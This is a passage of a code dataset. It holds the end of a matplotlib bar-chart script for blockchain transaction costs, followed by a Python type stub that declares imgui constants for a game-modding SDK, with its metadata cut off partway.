color=['steelblue', 'steelblue', 'steelblue', 'cadetblue', 'cadetblue'])\r\n\r\nplt.xticks(y_pos, objects, rotation=45)\r\n\r\nplt.ylabel('Transaction Cost (USD)')\r\nplt.xlabel('Functions')\r\nplt.title('BlockTaxi USD/Transaction')\r\n\r\n\r\nplt.savefig('myfile.png', bbox_inches = \"tight\")\r\nplt.show()", "repo_name": "sophiegraham99/Blockchain-Uber-App", "sub_path": "graphs/transactionCost.py", "file_name": "transactionCost.py", "file_ext": "py", "file_size_in_byte": 665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.pyplot.rcdefaults", "line_number": 1, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "24348033565", "text": "from imgui.core import *\nfrom imgui.extra import *\nfrom imgui import core as core, extra as extra, internal as internal\nfrom typing import Any\n\nVERSION: Any\nVERTEX_BUFFER_POS_OFFSET: Any\nVERTEX_BUFFER_UV_OFFSET: Any\nVERTEX_BUFFER_COL_OFFSET: Any\nVERTEX_SIZE: Any\nINDEX_SIZE: Any\nNONE: Any\nALWAYS: Any\nONCE: Any\nFIRST_USE_EVER: Any\nAPPEARING: Any\nKEY_TAB: Any\nKEY_LEFT_ARROW: Any\nKEY_RIGHT_ARROW: Any\nKEY_UP_ARROW: Any\nKEY_DOWN_ARROW: Any\nKEY_PAGE_UP: Any\nKEY_PAGE_DOWN: Any\nKEY_HOME: Any\nKEY_END: Any\nKEY_INSERT: Any\nKEY_DELETE: Any\nKEY_BACKSPACE: Any\nKEY_SPACE: Any\nKEY_ENTER: Any\nKEY_ESCAPE: Any\nKEY_PAD_ENTER: Any\nKEY_A: Any\nKEY_C: Any\nKEY_V: Any\nKEY_X: Any\nKEY_Y: Any\nKEY_Z: Any\nNAV_INPUT_ACTIVATE: Any\nNAV_INPUT_CANCEL: Any\nNAV_INPUT_INPUT: Any\nNAV_INPUT_MENU: Any\nNAV_INPUT_DPAD_LEFT: Any\nNAV_INPUT_DPAD_RIGHT: Any\nNAV_INPUT_DPAD_UP: Any\nNAV_INPUT_DPAD_DOWN: Any\nNAV_INPUT_L_STICK_LEFT: Any\nNAV_INPUT_L_STICK_RIGHT: Any\nNAV_INPUT_L_STICK_UP: Any\nNAV_INPUT_L_STICK_DOWN: Any\nNAV_INPUT_FOCUS_PREV: Any\nNAV_INPUT_FOCUS_NEXT: Any\nNAV_INPUT_TWEAK_SLOW: Any\nNAV_INPUT_TWEAK_FAST: Any\nKEY_MOD_NONE: Any\nKEY_MOD_CTRL: Any\nKEY_MOD_SHIFT: Any\nKEY_MOD_ALT: Any\nKEY_MOD_SUPER: Any\nSTYLE_ALPHA: Any\nSTYLE_WINDOW_PADDING: Any\nSTYLE_WINDOW_ROUNDING: Any\nSTYLE_WINDOW_BORDERSIZE: Any\nSTYLE_WINDOW_MIN_SIZE: Any\nSTYLE_WINDOW_TITLE_ALIGN: Any\nSTYLE_CHILD_ROUNDING: Any\nSTYLE_CHILD_BORDERSIZE: Any\nSTYLE_POPUP_ROUNDING: Any\nSTYLE_POPUP_BORDERSIZE: Any\nSTYLE_FRAME_PADDING: Any\nSTYLE_FRAME_ROUNDING: Any\nSTYLE_FRAME_BORDERSIZE: Any\nSTYLE_ITEM_SPACING: Any\nSTYLE_ITEM_INNER_SPACING: Any\nSTYLE_INDENT_SPACING: Any\nSTYLE_CELL_PADDING: Any\nSTYLE_SCROLLBAR_SIZE: Any\nSTYLE_SCROLLBAR_ROUNDING: Any\nSTYLE_GRAB_MIN_SIZE: Any\nSTYLE_GRAB_ROUNDING: Any\nSTYLE_TAB_ROUNDING: Any\nSTYLE_BUTTON_TEXT_ALIGN: Any\nSTYLE_SELECTABLE_TEXT_ALIGN: Any\nBUTTON_NONE: Any\nBUTTON_MOUSE_BUTTON_LEFT: Any\nBUTTON_MOUSE_BUTTON_RIGHT: Any\nBUTTON_MOUSE_BUTTON_MIDDLE: Any\nWINDOW_NONE: Any\nWINDOW_NO_TITLE_BAR: Any\nWINDOW_NO_RESIZE: Any\nWINDOW_NO_MOVE: Any\nWINDOW_NO_SCROLLBAR: Any\nWINDOW_NO_SCROLL_WITH_MOUSE: Any\nWINDOW_NO_COLLAPSE: Any\nWINDOW_ALWAYS_AUTO_RESIZE: Any\nWINDOW_NO_BACKGROUND: Any\nWINDOW_NO_SAVED_SETTINGS: Any\nWINDOW_NO_MOUSE_INPUTS: Any\nWINDOW_MENU_BAR: Any\nWINDOW_HORIZONTAL_SCROLLING_BAR: Any\nWINDOW_NO_FOCUS_ON_APPEARING: Any\nWINDOW_NO_BRING_TO_FRONT_ON_FOCUS: Any\nWINDOW_ALWAYS_VERTICAL_SCROLLBAR: Any\nWINDOW_ALWAYS_HORIZONTAL_SCROLLBAR: Any\nWINDOW_ALWAYS_USE_WINDOW_PADDING: Any\nWINDOW_NO_NAV_INPUTS: Any\nWINDOW_NO_NAV_FOCUS: Any\nWINDOW_UNSAVED_DOCUMENT: Any\nWINDOW_NO_NAV: Any\nWINDOW_NO_DECORATION: Any\nWINDOW_NO_INPUTS: Any\nCOLOR_EDIT_NONE: Any\nCOLOR_EDIT_NO_ALPHA: Any\nCOLOR_EDIT_NO_PICKER: Any\nCOLOR_EDIT_NO_OPTIONS: Any\nCOLOR_EDIT_NO_SMALL_PREVIEW: Any\nCOLOR_EDIT_NO_INPUTS: Any\nCOLOR_EDIT_NO_TOOLTIP: Any\nCOLOR_EDIT_NO_LABEL: Any\nCOLOR_EDIT_NO_SIDE_PREVIEW: Any\nCOLOR_EDIT_NO_DRAG_DROP: Any\nCOLOR_EDIT_NO_BORDER: Any\nCOLOR_EDIT_ALPHA_BAR: Any\nCOLOR_EDIT_ALPHA_PREVIEW: Any\nCOLOR_EDIT_ALPHA_PREVIEW_HALF: Any\nCOLOR_EDIT_HDR: Any\nCOLOR_EDIT_DISPLAY_RGB: Any\nCOLOR_EDIT_DISPLAY_HSV: Any\nCOLOR_EDIT_DISPLAY_HEX: Any\nCOLOR_EDIT_UINT8: Any\nCOLOR_EDIT_FLOAT: Any\nCOLOR_EDIT_PICKER_HUE_BAR: Any\nCOLOR_EDIT_PICKER_HUE_WHEEL: Any\nCOLOR_EDIT_INPUT_RGB: Any\nCOLOR_EDIT_INPUT_HSV: Any\nCOLOR_EDIT_DEFAULT_OPTIONS: Any\nTREE_NODE_NONE: Any\nTREE_NODE_SELECTED: Any\nTREE_NODE_FRAMED: Any\nTREE_NODE_ALLOW_ITEM_OVERLAP: Any\nTREE_NODE_NO_TREE_PUSH_ON_OPEN: Any\nTREE_NODE_NO_AUTO_OPEN_ON_LOG: Any\nTREE_NODE_DEFAULT_OPEN: Any\nTREE_NODE_OPEN_ON_DOUBLE_CLICK: Any\nTREE_NODE_OPEN_ON_ARROW: Any\nTREE_NODE_LEAF: Any\nTREE_NODE_BULLET: Any\nTREE_NODE_FRAME_PADDING: Any\nTREE_NODE_SPAN_AVAILABLE_WIDTH: Any\nTREE_NODE_SPAN_FULL_WIDTH: Any\nTREE_NODE_NAV_LEFT_JUPS_BACK_HERE: Any\nTREE_NODE_COLLAPSING_HEADER: Any\nPOPUP_NONE: Any\nPOPUP_MOUSE_BUTTON_LEFT: Any\nPOPUP_MOUSE_BUTTON_RIGHT: Any\nPOPUP_MOUSE_BUTTON_MIDDLE: Any\nPOPUP_MOUSE_BUTTON_MASK: Any\nPOPUP_MOUSE_BUTTON_DEFAULT: Any\nPOPUP_NO_OPEN_OVER_EXISTING_POPUP: Any\nPOPUP_NO_OPEN_OVER_ITEMS: Any\nPOPUP_ANY_POPUP_ID: Any\nPOPUP_ANY_POPUP_LEVEL: Any\nPOPUP_ANY_POPUP: Any\nCOLOR_TEXT: Any\nCOLOR_TEXT_DISABLED: Any\nCOLOR_WINDOW_BACKGROUND: Any\nCOLOR_CHILD_BACKGROUND: Any\nCOLOR_POPUP_BACKGROUND: Any\nCOLOR_BORDER: Any\nCOLOR_BORDER_SHADOW: Any\nCOLOR_FRAME_BACKGROUND: Any\nCOLOR_FRAME_BACKGROUND_HOVERED: Any\nCOLOR_FRAME_BACKGROUND_ACTIVE: Any\nCOLOR_TITLE_BACKGROUND: Any\nCOLOR_TITLE_BACKGROUND_ACTIVE: Any\nCOLOR_TITLE_BACKGROUND_COLLAPSED: Any\nCOLOR_MENUBAR_BACKGROUND: Any\nCOLOR_SCROLLBAR_BACKGROUND: Any\nCOLOR_SCROLLBAR_GRAB: Any\nCOLOR_SCROLLBAR_GRAB_HOVERED: Any\nCOLOR_SCROLLBAR_GRAB_ACTIVE: Any\nCOLOR_CHECK_MARK: Any\nCOLOR_SLIDER_GRAB: Any\nCOLOR_SLIDER_GRAB_ACTIVE: Any\nCOLOR_BUTTON: Any\nCOLOR_BUTTON_HOVERED: Any\nCOLOR_BUTTON_ACTIVE: Any\nCOLOR_HEADER: Any\nCOLOR_HEADER_HOVERED: Any\nCOLOR_HEADER_ACTIVE: Any\nCOLOR_SEPARATOR: Any\nCOLOR_SEPARATOR_HOVERED: Any\nCOLOR_SEPARATOR_ACTIVE: Any\nCOLOR_RESIZE_GRIP: Any\nCOLOR_RESIZE_GRIP_HOVERED: Any\nCOLOR_RESIZE_GRIP_ACTIVE: Any\nCOLOR_TAB = COLOR_TAB\nCOLOR_TAB_HOVERED = COLOR_TAB_HOVERED\nCOLOR_TAB_ACTIVE = COLOR_TAB_ACTIVE\nCOLOR_TAB_UNFOCUSED = COLOR_TAB_UNFOCUSED\nCOLOR_TAB_UNFOCUSED_ACTIVE = COLOR_TAB_UNFOCUSED_ACTIVE\nCOLOR_PLOT_LINES: Any\nCOLOR_PLOT_LINES_HOVERED: Any\nCOLOR_PLOT_HISTOGRAM: Any\nCOLOR_PLOT_HISTOGRAM_HOVERED: Any\nCOLOR_TABLE_HEADER_BACKGROUND: Any\nCOLOR_TABLE_BORDER_STRONG: Any\nCOLOR_TABLE_BORDER_LIGHT: Any\nCOLOR_TABLE_ROW_BACKGROUND: Any\nCOLOR_TABLE_ROW_BACKGROUND_ALT: Any\nCOLOR_TEXT_SELECTED_BACKGROUND: Any\nCOLOR_DRAG_DROP_TARGET: Any\nCOLOR_NAV_HIGHLIGHT: Any\nCOLOR_NAV_WINDOWING_HIGHLIGHT: Any\nCOLOR_NAV_WINDOWING_DIM_BACKGROUND: Any\nCOLOR_MODAL_WINDOW_DIM_BACKGROUND: Any\nCOLOR_COUNT: Any\nDATA_TYPE_S8: Any\nDATA_TYPE_U8: Any\nDATA_TYPE_S16: Any\nDATA_TYPE_U16: Any\nDATA_TYPE_S32: Any\nDATA_TYPE_U32: Any\nDATA_TYPE_S64: Any\nDATA_TYPE_U64: Any\nDATA_TYPE_FLOAT: Any\nDATA_TYPE_DOUBLE: Any\nSELECTABLE_NONE: Any\nSELECTABLE_DONT_CLOSE_POPUPS: Any\nSELECTABLE_SPAN_ALL_COLUMNS: Any\nSELECTABLE_ALLOW_DOUBLE_CLICK: Any\nSELECTABLE_DISABLED: Any\nSELECTABLE_ALLOW_ITEM_OVERLAP: Any\nCOMBO_NONE: Any\nCOMBO_POPUP_ALIGN_LEFT: Any\nCOMBO_HEIGHT_SMALL: Any\nCOMBO_HEIGHT_REGULAR: Any\nCOMBO_HEIGHT_LARGE: Any\nCOMBO_HEIGHT_LARGEST: Any\nCOMBO_NO_ARROW_BUTTON: Any\nCOMBO_NO_PREVIEW: Any\nCOMBO_HEIGHT_MASK: Any\nTAB_BAR_NONE: Any\nTAB_BAR_REORDERABLE: Any\nTAB_BAR_AUTO_SELECT_NEW_TABS: Any\nTAB_BAR_TAB_LIST_POPUP_BUTTON: Any\nTAB_BAR_NO_CLOSE_WITH_MIDDLE_MOUSE_BUTTON: Any\nTAB_BAR_NO_TAB_LIST_SCROLLING_BUTTONS: Any\nTAB_BAR_NO_TOOLTIP: Any\nTAB_BAR_FITTING_POLICY_RESIZE_DOWN: Any\nTAB_BAR_FITTING_POLICY_SCROLL: Any\nTAB_BAR_FITTING_POLICY_MASK: Any\nTAB_BAR_FITTING_POLICY_DEFAULT: Any\nTAB_ITEM_NONE: Any\nTAB_ITEM_UNSAVED_DOCUMENT: Any\nTAB_ITEM_SET_SELECTED: Any\nTAB_ITEM_NO_CLOSE_WITH_MIDDLE_MOUSE_BUTTON: Any\nTAB_ITEM_NO_PUSH_ID: Any\nTAB_ITEM_NO_TOOLTIP: Any\nTAB_ITEM_NO_REORDER: Any\nTAB_ITEM_LEADING: Any\nTAB_ITEM_TRAILING: Any\nTABLE_NONE: Any\nTABLE_RESIZABLE: Any\nTABLE_REORDERABLE: Any\nTABLE_HIDEABLE: Any\nTABLE_SORTABLE: Any\nTABLE_NO_SAVED_SETTINGS: Any\nTABLE_CONTEXT_MENU_IN_BODY: Any\nTABLE_ROW_BACKGROUND: Any\nTABLE_BORDERS_INNER_HORIZONTAL: Any\nTABLE_BORDERS_OUTER_HORIZONTAL: Any\nTABLE_BORDERS_INNER_VERTICAL: Any\nTABLE_BORDERS_OUTER_VERTICAL: Any\nTABLE_BORDERS_HORIZONTAL: Any\nTABLE_BORDERS_VERTICAL: Any\nTABLE_BORDERS_INNER: Any\nTABLE_BORDERS_OUTER: Any\nTABLE_BORDERS: Any\nTABLE_NO_BORDERS_IN_BODY: Any\nTABLE_NO_BORDERS_IN_BODY_UTIL_RESIZE: Any\nTABLE_SIZING_FIXED_FIT: Any\nTABLE_SIZING_FIXED_SAME: Any\nTABLE_SIZING_STRETCH_PROP: Any\nTABLE_SIZING_STRETCH_SAME: Any\nTABLE_NO_HOST_EXTEND_X: Any\nTABLE_NO_HOST_EXTEND_Y: Any\nTABLE_NO_KEEP_COLUMNS_VISIBLE: Any\nTABLE_PRECISE_WIDTHS: Any\nTABLE_NO_CLIP: Any\nTABLE_PAD_OUTER_X: Any\nTABLE_NO_PAD_OUTER_X: Any\nTABLE_NO_PAD_INNER_X: Any\nTABLE_SCROLL_X: Any\nTABLE_SCROLL_Y: Any\nTABLE_SORT_MULTI: Any\nTABLE_SORT_TRISTATE: Any\nTABLE_COLUMN_NONE: Any\nTABLE_COLUMN_DEFAULT_HIDE: Any\nTABLE_COLUMN_DEFAULT_SORT: Any\nTABLE_COLUMN_WIDTH_STRETCH: Any\nTABLE_COLUMN_WIDTH_FIXED: Any\nTABLE_COLUMN_NO_RESIZE: Any\nTABLE_COLUMN_NO_REORDER: Any\nTABLE_COLUMN_NO_HIDE: Any\nTABLE_COLUMN_NO_CLIP: Any\nTABLE_COLUMN_NO_SORT: Any\nTABLE_COLUMN_NO_SORT_ASCENDING: Any\nTABLE_COLUMN_NO_SORT_DESCENDING: Any\nTABLE_COLUMN_NO_HEADER_WIDTH: Any\nTABLE_COLUMN_PREFER_SORT_ASCENDING: Any\nTABLE_COLUMN_PREFER_SORT_DESCENDING: Any\nTABLE_COLUMN_INDENT_ENABLE: Any\nTABLE_COLUMN_INDENT_DISABLE: Any\nTABLE_COLUMN_IS_ENABLED: Any\nTABLE_COLUMN_IS_VISIBLE: Any\nTABLE_COLUMN_IS_SORTED: Any\nTABLE_COLUMN_IS_HOVERED: Any\nTABLE_ROW_NONE: Any\nTABLE_ROW_HEADERS: Any\nTABLE_BACKGROUND_TARGET_NONE: Any\nTABLE_BACKGROUND_TARGET_ROW_BG0: Any\nTABLE_BACKGROUND_TARGET_ROW_BG1: Any\nTABLE_BACKGROUND_TARGET_CELL_BG: Any\nFOCUS_NONE: Any\nFOCUS_CHILD_WINDOWS: Any\nFOCUS_ROOT_WINDOW: Any\nFOCUS_ANY_WINDOW: Any\nFOCUS_ROOT_AND_CHILD_WINDOWS: Any\nHOVERED_NONE: Any\nHOVERED_CHILD_WINDOWS: Any\nHOVERED_ROOT_WINDOW: Any\nHOVERED_ANY_WINDOW: Any\nHOVERED_ALLOW_WHEN_BLOCKED_BY_POPUP: Any\nHOVERED_ALLOW_WHEN_BLOCKED_BY_ACTIVE_ITEM: Any\nHOVERED_ALLOW_WHEN_OVERLAPPED: Any\nHOVERED_ALLOW_WHEN_DISABLED: Any\nHOVERED_RECT_ONLY: Any\nHOVERED_ROOT_AND_CHILD_WINDOWS: Any\nDRAG_DROP_NONE: Any\nDRAG_DROP_SOURCE_NO_PREVIEW_TOOLTIP: Any\nDRAG_DROP_SOURCE_NO_DISABLE_HOVER: Any\nDRAG_DROP_SOURCE_NO_HOLD_TO_OPEN_OTHERS: Any\nDRAG_DROP_SOURCE_ALLOW_NULL_ID: Any\nDRAG_DROP_SOURCE_EXTERN: Any\nDRAG_DROP_SOURCE_AUTO_EXPIRE_PAYLOAD: Any\nDRAG_DROP_ACCEPT_BEFORE_DELIVERY: Any\nDRAG_DROP_ACCEPT_NO_DRAW_DEFAULT_RECT: Any\nDRAG_DROP_ACCEPT_NO_PREVIEW_TOOLTIP: Any\nDRAG_DROP_ACCEPT_PEEK_ONLY: Any\nDIRECTION_NONE: Any\nDIRECTION_LEFT: Any\nDIRECTION_RIGHT: Any\nDIRECTION_UP: Any\nDIRECTION_DOWN: Any\nSORT_DIRECTION_NONE: Any\nSORT_DIRECTION_ASCENDING: Any\nSORT_DIRECTION_DESCENDING: Any\nMOUSE_CURSOR_NONE: Any\nMOUSE_CURSOR_ARROW: Any\nMOUSE_CURSOR_TEXT_INPUT: Any\nMOUSE_CURSOR_RESIZE_ALL: Any\nMOUSE_CURSOR_RESIZE_NS: Any\nMOUSE_CURSOR_RESIZE_EW: Any\nMOUSE_CURSOR_RESIZE_NESW: Any\nMOUSE_CURSOR_RESIZE_NWSE: Any\nMOUSE_CURSOR_HAND: Any\nMOUSE_CURSOR_NOT_ALLOWED: Any\nINPUT_TEXT_NONE: Any\nINPUT_TEXT_CHARS_DECIMAL: Any\nINPUT_TEXT_CHARS_HEXADECIMAL: Any\nINPUT_TEXT_CHARS_UPPERCASE: Any\nINPUT_TEXT_CHARS_NO_BLANK: Any\nINPUT_TEXT_AUTO_SELECT_ALL: Any\nINPUT_TEXT_ENTER_RETURNS_TRUE: Any\nINPUT_TEXT_CALLBACK_COMPLETION: Any\nINPUT_TEXT_CALLBACK_HISTORY: Any\nINPUT_TEXT_CALLBACK_ALWAYS: Any\nINPUT_TEXT_CALLBACK_CHAR_FILTER: Any\nINPUT_TEXT_ALLOW_TAB_INPUT: Any\nINPUT_TEXT_CTRL_ENTER_FOR_NEW_LINE: Any\nINPUT_TEXT_NO_HORIZONTAL_SCROLL: Any\nINPUT_TEXT_ALWAYS_OVERWRITE: Any\nINPUT_TEXT_ALWAYS_INSERT_MODE: Any\nINPUT_TEXT_READ_ONLY: Any\nINPUT_TEXT_PASSWORD: Any\nINPUT_TEXT_NO_UNDO_REDO: Any\nINPUT_TEXT_CHARS_SCIENTIFIC: Any\nINPUT_TEXT_CALLBACK_RESIZE: Any\nINPUT_TEXT_CALLBACK_EDIT: Any\nDRAW_CORNER_NONE: Any\nDRAW_CORNER_TOP_LEFT: Any\nDRAW_CORNER_TOP_RIGHT: Any\nDRAW_CORNER_BOTTOM_LEFT: Any\nDRAW_CORNER_BOTTOM_RIGHT: Any\nDRAW_CORNER_TOP: Any\nDRAW_CORNER_BOTTOM: Any\nDRAW_CORNER_LEFT: Any\nDRAW_CORNER_RIGHT: Any\nDRAW_CORNER_ALL: Any\nDRAW_NONE: Any\nDRAW_CLOSED: Any\nDRAW_ROUND_CORNERS_TOP_LEFT: Any\nDRAW_ROUND_CORNERS_TOP_RIGHT: Any\nDRAW_ROUND_CORNERS_BOTTOM_LEFT: Any\nDRAW_ROUND_CORNERS_BOTTOM_RIGHT: Any\nDRAW_ROUND_CORNERS_NONE: Any\nDRAW_ROUND_CORNERS_TOP: Any\nDRAW_ROUND_CORNERS_BOTTOM: Any\nDRAW_ROUND_CORNERS_LEFT: Any\nDRAW_ROUND_CORNERS_RIGHT: Any\nDRAW_ROUND_CORNERS_ALL: Any\nDRAW_LIST_NONE: Any\nDRAW_LIST_ANTI_ALIASED_LINES: Any\nDRAW_LIST_ANTI_ALIASED_LINES_USE_TEX: Any\nDRAW_LIST_ANTI_ALIASED_FILL: Any\nDRAW_LIST_ALLOW_VTX_OFFSET: Any\nFONT_ATLAS_NONE: Any\nFONT_ATLAS_NO_POWER_OF_TWO_HEIGHT: Any\nFONT_ATLAS_NO_MOUSE_CURSOR: Any\nFONT_ATLAS_NO_BAKED_LINES: Any\nCONFIG_NONE: Any\nCONFIG_NAV_ENABLE_KEYBOARD: Any\nCONFIG_NAV_ENABLE_GAMEPAD: Any\nCONFIG_NAV_ENABLE_SET_MOUSE_POS: Any\nCONFIG_NAV_NO_CAPTURE_KEYBOARD: Any\nCONFIG_NO_MOUSE: Any\nCONFIG_NO_MOUSE_CURSOR_CHANGE: Any\nCONFIG_IS_RGB: Any\nCONFIG_IS_TOUCH_SCREEN: Any\nBACKEND_NONE: Any\nBACKEND_HAS_GAMEPAD: Any\nBACKEND_HAS_MOUSE_CURSORS: Any\nBACKEND_HAS_SET_MOUSE_POS: Any\nBACKEND_RENDERER_HAS_VTX_OFFSET: Any\nMOUSE_BUTTON_LEFT: Any\nMOUSE_BUTTON_RIGHT: Any\nMOUSE_BUTTON_MIDDLE: Any\nVIEWPORT_FLAGS_NONE: Any\nVIEWPORT_FLAGS_IS_PLATFORM_WINDOW: Any\nVIEWPORT_FLAGS_IS_PLATFORM_MONITOR: Any\nVIEWPORT_FLAGS_OWNED_BY_APP: Any\n", "repo_name": "juso40/bl2sdk_Mods", "sub_path": "blimgui/dist/out/imgui/__init__.pyi", "file_name": "__init__.pyi", "file_ext": "pyi", "file_size_in_byte": 12124, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 35, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Any", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 60, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 65, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 81, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 86, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 88, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 89, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 90, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 91, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 92, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 96, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 99, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 100, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 102, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 103, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 104, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 105, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 108, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 110, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 111, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 112, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 113, "usage_type": "name"}, 